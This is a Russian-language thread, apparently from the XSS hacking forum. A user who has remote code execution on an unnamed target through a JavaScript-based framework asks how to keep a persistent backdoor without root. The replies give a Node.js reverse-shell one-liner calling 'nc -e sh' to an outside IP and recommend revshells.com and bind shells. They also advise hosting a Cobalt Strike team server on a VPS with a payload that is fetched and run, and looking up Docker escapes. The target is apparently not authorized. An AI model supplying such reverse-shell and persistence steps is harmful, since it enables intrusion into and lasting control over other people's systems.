• XSS.stack #1 – первый литературный журнал от юзеров форума

Аналог php web shell на тачках где нет php

hiddenname3

RAM
Забанен
Регистрация
03.10.2024
Сообщения
140
Реакции
44
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
в общем, вопрос в заголовке, на тачке javascript, рут прав нет, цель удаленно выполнять комманды

upd. точнее не на тачке javascript, а фреймворк в котором уязвимость использует javascript, возможность каждый раз эксплуатировать эту уязвимость нет, поэтому интересно если есть какой-то вариант забэкдорить
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Какой фреймворк? Пробуй реверсешел запустить https://www.revshells.com/
допустим для nodejs require('child_process').exec('nc -e sh 10.10.10.10 9999')
мой впс почему-то не принимает nc
вообще я могу выполнять там shell, также как я понял уязвимое приложение находится в докер контейнере (но не всегда), пишет юзер рут
в идеале бы какой-нибудь магический бинарник который закрепляется в системе и слушает поступающие команды, такой вообще существует? чтобы лишний раз уязвимость не эксплуатировать
 
мой впс почему-то не принимает nc
Не принимает nc в каком смысле? Коннект не приходит? Так может код не исполняется, попробуй другие пейлоады
в идеале бы какой-нибудь магический бинарник который закрепляется в системе и слушает поступающие команды, такой вообще существует? чтобы лишний раз уязвимость не эксплуатировать
bindshell? как ты узнаешь айпи бекеэнда где код выполняется? И там фаерволы тебя не пустят

вообще я могу выполнять там shell
как это? ты себя взламываешь?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
bindshell
это интересно, изучу, спасибо
Коннект не приходит?
да в целом коннекты не приходят, ниоткуда, такой провайдер думаю, единственное отличие замечал что у многих:
listening on 0.0.0.0
а у меня:
listening on [any]
хотя по сути разницы нет
как ты узнаешь айпи бекеэнда где код выполняется? И там фаерволы тебя не пустят
тут не понял, я к бэкэнду и обращаюсь эксплуатируя уязвимость, докер хостится на айпи с портом
как это? ты себя взламываешь?
нет, брутфорсингом пинкода начального экрана своей windows занимаюсь, практикую этичный хакинг

кроме бреда, пейлоад это и есть shell, дело не в этом, rce есть, вопрос треда в том чтобы эту rce реализовать бэкдором (что называется пост-эксплуатация), а не через уязвимость, так как в целом это может быть пофикшено и т.д.
 
это интересно, изучу, спасибо

да в целом коннекты не приходят, ниоткуда, такой провайдер думаю, единственное отличие замечал что у многих:
listening on 0.0.0.0
а у меня:
listening on [any]
хотя по сути разницы нет

тут не понял, я к бэкэнду и обращаюсь эксплуатируя уязвимость, докер хостится на айпи с портом

нет, брутфорсингом пинкода начального экрана своей windows занимаюсь, практикую этичный хакинг

кроме бреда, пейлоад это и есть shell, дело не в этом, rce есть, вопрос треда в том чтобы эту rce реализовать бэкдором (что называется пост-эксплуатация), а не через уязвимость, так как в целом это может быть пофикшено и т.д.
Ты сумбурно пишешь. Кидай таргет в тред или под хайд, так проще будет посмотреть че у тебя там и обьяснить
Надо писать что за таргет (веб сайт или машина в сети), что за cve, что уже получилось делать. Ты написал - "вообще я могу выполнять там shell" ну все дальше делай что хотел. Дальше берешь кобу, хостишь team server на впске, генерируешь пейлоад, хостишь его также на впске и пишешь скрипт который подгрузит его с твоего сервера и запустит (либо вместо ревшела сразу пиши в пейлоаде загрузку и запуск). Если ты оказался в докер контейнере то гугли escape from docker https://www.google.com/search?q=escape+from+docker+container
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Ты сумбурно пишешь, нихуя не понятно. Кидай таргет в тред или под хайд, так проще будет посмотреть че у тебя там
не вариант, в целом даже название фреймворка сказать тут на растерзание будет тупо, сам понимаешь, если понимаешь
 
не вариант, в целом даже название фреймворка сказать тут на растерзание будет тупо, сам понимаешь, если понимаешь
1с или битрикс? обычно хитрожопые пишут что white hat и тестируют заказчика с его разрешения, тут такое не запрещенно
 
не вариант, в целом даже название фреймворка сказать тут на растерзание будет тупо, сам понимаешь, если понимаешь
Ну тогда не понимаю, как и чем тебе помогать без малейшей инфы, я написал уже что делать https://xss.pro/threads/130253/post-920509
 
Какой фреймворк? Пробуй реверсешел запустить https://www.revshells.com/
допустим для nodejs require('child_process').exec('nc -e sh 10.10.10.10 9999')
Если знаешь директории и можешь выполнять JS, попробуй сперва пустой файл создать а потом уже посмотри что-да-как
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скрытый контент для пользователей: .
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх